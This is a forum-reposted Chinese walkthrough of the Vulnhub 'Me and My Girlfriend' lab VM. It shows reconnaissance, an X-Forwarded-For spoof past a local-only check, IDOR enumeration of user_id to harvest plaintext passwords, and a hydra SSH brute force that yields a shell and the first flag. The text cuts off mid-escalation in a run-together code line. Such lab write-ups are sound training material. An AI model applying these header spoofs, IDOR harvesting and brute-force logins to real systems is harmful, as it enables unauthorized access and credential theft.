ToB企服应用市场:ToB评测及商务社交产业平台

标题: Vulnhub之Me and Mygirlfriend详细测试过程 [打印本页]

---

作者: 惊雷无声    时间: 2023-4-9 15:06
标题: Vulnhub之Me and Mygirlfriend详细测试过程
Me and Mygirlfriend

作者：jason huawen
靶机信息

名称： Me and My Girlfriend: 1
地址：

1. https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

复制代码

识别目标主机IP地址

1. ─(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
4.                                                                                                                            
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
10. 192.168.56.100  08:00:27:61:8a:f1      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.254  08:00:27:87:26:b3      1      60  PCS Systemtechnik GmbH            

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 20:16 EDT
4. Nmap scan report for www.armour.local (192.168.56.254)
5. Host is up (0.000071s latency).
6. Not shown: 65533 closed tcp ports (reset)
7. PORT   STATE SERVICE VERSION
8. 22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
9. | ssh-hostkey:
10. |   1024 57e15658460433563dc34ba793ee2316 (DSA)
11. |   2048 3b264de4a03bf875d96e1555828c7197 (RSA)
12. |   256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
13. |_  256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
14. 80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
15. |_http-title: Site doesn't have a title (text/html).
16. |_http-server-header: Apache/2.4.7 (Ubuntu)
17. MAC Address: 08:00:27:87:26:B3 (Oracle VirtualBox virtual NIC)
18. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
20. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
21. Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds
22.                                                                            

复制代码

NMAP扫描结果表明目标主机有2个开放端口：22（ssh)、80(http)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
2. └─$ curl http://192.168.56.254                       
3. Who are you? Hacker? Sorry This Site Can Only Be Accessed local!

复制代码

站点只能从本地访问，而且提示是在请求头中设置x-forwarded-for
可以用burpsuite拦截请求，然后增加x-forwarded-for：127.0.0.1

1. ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
2. └─$ curl http://192.168.56.254/robots.txt
3. User-Agent: *
4. Allow: /heyhoo.txt         

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
2. └─$ curl http://192.168.56.254/heyhoo.txt
3. Great! What you need now is reconn, attack and got the shell     

复制代码

<img alt="" loading="lazy">
此时成功得到页面：
<img alt="" loading="lazy">
不过用Burpsuite每次修改请求比较麻烦，可以用浏览器的插件IP，伪装X-Forwarded-For字段
从URL来看，是否会存在本地文件包含漏洞？

1. http://192.168.56.254/index.php?page=login

复制代码

但经过测试，没有得到任何返回，不过也没有报错
用PHP filter也没有成功

1. http://192.168.56.254/index.php?page=php://filter/convert.base64-encode/resource=index

复制代码

用burpsuite拦截请求，并将请求存储为文件，然后用sqlmap扫描，看是否存在SQL注入漏洞？

1. (kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
2. └─$ sqlmap -r req.txt --level=5

复制代码

SQLMAP并没有发现出SQL注入漏洞。
接下来注册一个用户test，看有什么发现？以test用户登录后
<img alt="" loading="lazy">
注意这里的URL：

1. http://192.168.56.254/index.php?page=dashboard&user_id=14

复制代码

我们看是否可以通过修改user_id值进行水平攻击
当修改user_id=1时，查看profile
<img alt="" loading="lazy">
注意此时查看页面源代码，竟然有用户的明文密码：

1. <!DOCTYPE html>
2. <html lang="en">
3. <head>
4.     <meta charset="UTF-8">
5.     <meta name="viewport" content="width=device-width, initial-scale=1.0">
6.     <meta http-equiv="X-UA-Compatible" content="ie=edge">
7.     <title>Ceban Corp</title>
8.    
9. </head>
10. <body>
12.    
13.         <h2>Welcome To Ceban Corp</h2>
14.         <p>Inspiring The People To Great Again!</p>
15.         <hr>
16.                 <p><a target="_blank" href="https://www.cnblogs.com/?page=dashboard">Dashboard</a> | <a target="_blank" href="https://www.cnblogs.com/?page=profile&user_id=14">Profile</a> | <a target="_blank" href="https://www.cnblogs.com/?page=logout">Logout</a></p>
17.                 <hr>
18.    
20.     <form action="#" method="POST">
21.     <label for="name">Name</label>
22.     <input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
23.     <label for="username">Username</label>
24.     <input type="text" name="username" id="username" value="eweuhtandingan"><br>
25.     <label for="password">Password</label>
26.     <input type="password" name="password" id="password" value="skuyatuh"><br>
27.     <button disabled="disabled">Change</button>
28. </form>
30. </body>
31. </html>

复制代码

那该用户名和密码是否也是SSH的用户名和密码？但发现不成功，可以将所有的用户的用户名和密码都收集起来：（即依次将user_id枚举从1到没有返回内容为止）

1. ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
2. └─$ ssh eweuhtandingan@192.168.56.254                              
3. The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
4. ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
5. This key is not known by any other names.
6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7. Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
8. eweuhtandingan@192.168.56.254's password:
9. Permission denied, please try again.
10. eweuhtandingan@192.168.56.254's password:

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
2. └─$ cat users.dict
3. eweuhtandingan
4. aingmaung
5. sundatea
6. sedihaingmah
7. alice
8.                                                                                                                               
9. ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
10. └─$ cat pass.dict
11. skuyatuh
12. qwerty!!!
13. indONEsia
14. cedihhihihi
15. 4lic3
16.                

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
2. └─$ hydra -L users.dict -P pass.dict ssh://192.168.56.254                 
3. Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
5. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-08 21:09:16
6. [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
7. [DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
8. [DATA] attacking ssh://192.168.56.254:22/
9. [22][ssh] host: 192.168.56.254   login: alice   password: 4lic3
10. 1 of 1 target successfully completed, 1 valid password found
11. [WARNING] Writing restore file because 2 final worker threads did not complete until end.
12. [ERROR] 2 targets did not resolve or could not be connected
13. [ERROR] 0 target did not complete
14. Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-08 21:09:20

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
2. └─$ ssh alice@192.168.56.254         
3. alice@192.168.56.254's password:
4. Last login: Fri Dec 13 14:48:25 2019
5. alice@gfriEND:~$ id
6. uid=1000(alice) gid=1001(alice) groups=1001(alice)
7. alice@gfriEND:~$ ls -alh
8. total 32K
9. drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 .
10. drwxr-xr-x 6 root  root  4.0K Dec 13  2019 ..
11. -rw------- 1 alice alice   10 Dec 13  2019 .bash_history
12. -rw-r--r-- 1 alice alice  220 Dec 13  2019 .bash_logout
13. -rw-r--r-- 1 alice alice 3.6K Dec 13  2019 .bashrc
14. drwx------ 2 alice alice 4.0K Dec 13  2019 .cache
15. drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .my_secret
16. -rw-r--r-- 1 alice alice  675 Dec 13  2019 .profile
17. alice@gfriEND:~$ cat .bash_history
18. exit
19. exit
20. alice@gfriEND:~$ cd .my_secret/
21. alice@gfriEND:~/.my_secret$ ls -alh
22. total 16K
23. drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .
24. drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 ..
25. -rw-r--r-- 1 root  root   306 Dec 13  2019 flag1.txt
26. -rw-rw-r-- 1 alice alice  119 Dec 13  2019 my_notes.txt
27. alice@gfriEND:~/.my_secret$ cat flag1.txt
28. Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
30. Now your last job is get access to the root and read the flag ^_^
32. Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
33. alice@gfriEND:~/.my_secret$ cat my_notes.txt
34. Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
35. alice@gfriEND:~/.my_secret$ cd /home
36. alice@gfriEND:/home$ ls -alh
37. total 24K
38. drwxr-xr-x  6 root           root           4.0K Dec 13  2019 .
39. drwxr-xr-x 22 root           root           4.0K Dec 13  2019 ..
40. drwxr-xr-x  2 aingmaung      aingmaung      4.0K Dec 13  2019 aingmaung
41. drwxr-xr-x  4 alice          alice          4.0K Dec 13  2019 alice
42. drwxr-xr-x  2 eweuhtandingan eweuhtandingan 4.0K Dec 13  2019 eweuhtandingan
43. drwxr-xr-x  2 sundatea       sundatea       4.0K Dec 13  2019 sundatea

复制代码

至此得到了第一Flag.
提权

[code]alice@gfriEND:/var/www/html$ cd configalice@gfriEND:/var/www/html/config$ ls -alhtotal 12Kdrwxrwxr-x 2 root root 4.0K Dec 13  2019 .drwxr-xr-x 5 root root 4.0K Dec 13  2019 ..-rw-rw-r-- 1 root root   88 Dec 13  2019 config.phpalice@gfriEND:/var/www/html/config$ cat config.php

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4